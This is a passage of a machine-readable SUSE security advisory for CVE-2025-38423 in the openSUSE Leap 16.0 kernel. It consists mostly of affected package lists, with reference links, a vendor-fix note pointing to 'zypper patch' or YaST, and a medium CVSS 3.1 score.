"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38423",
"url": "https://www.suse.com/security/cve/CVE-2025-38423"
},
{
"category": "external",
"summary": "SUSE Bug 1247292 for CVE-2025-38423",
"url": "https://bugzilla.suse.com/1247292"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
